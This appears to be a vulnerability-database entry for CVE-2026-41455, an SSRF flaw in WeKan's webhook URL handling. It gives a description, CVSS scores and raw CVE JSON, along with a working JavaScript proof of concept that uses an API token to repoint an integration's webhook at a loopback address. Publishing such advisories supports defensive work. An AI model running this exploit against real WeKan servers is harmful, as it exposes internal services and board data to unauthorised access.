Security Vulnerability Report
CVE-2026-41455 CVSS 8.5 HIGH

CVE-2026-41455

Published: 2026-04-22 22:16:33
Last Modified: 2026-04-23 16:27:12

Description

WeKan before 8.35 contains a server-side request forgery vulnerability in webhook integration URL handling where the url schema field accepts any string without protocol restriction or destination validation. Attackers who can create or modify integrations can set webhook URLs to internal network addresses, causing the server to issue HTTP POST requests to attacker-controlled internal targets with full board event payloads, and can additionally exploit response handling to overwrite arbitrary comment text without authorization checks.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WeKan < 8.35

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for WeKan SSRF (CVE-2026-41455)
// Shows the behaviour described in the advisory: the integration `url`
// field is accepted without scheme or destination checks, so a board member
// holding an API token can point a webhook at a non-public address.
// Fixed in WeKan 8.35 (see references); existing integration URLs should be
// audited for private/loopback destinations after upgrading.
const fetch = require('node-fetch');

/**
 * Rewrite one integration's webhook URL through the REST API and log the outcome.
 * Needs board edit permissions and a valid API token.
 *
 * @param {string} targetUrl - Base URL of the WeKan instance.
 * @param {string} boardId - Board that owns the integration.
 * @param {string} integrationId - Integration whose URL is replaced.
 * @param {string} apiToken - Bearer token sent in the Authorization header.
 * @returns {Promise<void>} Resolves after logging; network errors are logged, not rethrown.
 */
async function exploitSSRF(targetUrl, boardId, integrationId, apiToken) {
  // Loopback destination that the unpatched server does not reject.
  const destination = 'http://127.0.0.1:22';
  const endpoint = `${targetUrl}/api/boards/${boardId}/integrations/${integrationId}`;
  const payload = JSON.stringify({ url: destination, isEnabled: true });

  try {
    const response = await fetch(endpoint, {
      method: 'PUT',
      headers: {
        Authorization: `Bearer ${apiToken}`,
        'Content-Type': 'application/json',
      },
      body: payload,
    });

    if (!response.ok) {
      console.log('[-] Failed to update webhook.');
      return;
    }

    console.log('[+] Webhook updated successfully. SSRF triggered on next board event.');
    console.log(`[+] Target set to: ${destination}`);
  } catch (error) {
    console.error('Error:', error);
  }
}

// Usage:
// exploitSSRF('http://target-wekan-url', 'BOARD_ID', 'INTEGRATION_ID', 'USER_API_TOKEN');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41455", "sourceIdentifier": "[email protected]", "published": "2026-04-22T22:16:32.677", "lastModified": "2026-04-23T16:27:11.540", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeKan before 8.35 contains a server-side request forgery vulnerability in webhook integration URL handling where the url schema field accepts any string without protocol restriction or destination validation. Attackers who can create or modify integrations can set webhook URLs to internal network addresses, causing the server to issue HTTP POST requests to attacker-controlled internal targets with full board event payloads, and can additionally exploit response handling to overwrite arbitrary comment text without authorization checks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/wekan/wekan/commit/2cd702f48df2b8aef0e7381685f8e089986a18a4", "source": "[email protected]"}, {"url": "https://github.com/wekan/wekan/releases/tag/v8.35", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wekan-ssrf-via-webhook-url", "source": "[email protected]"}]}}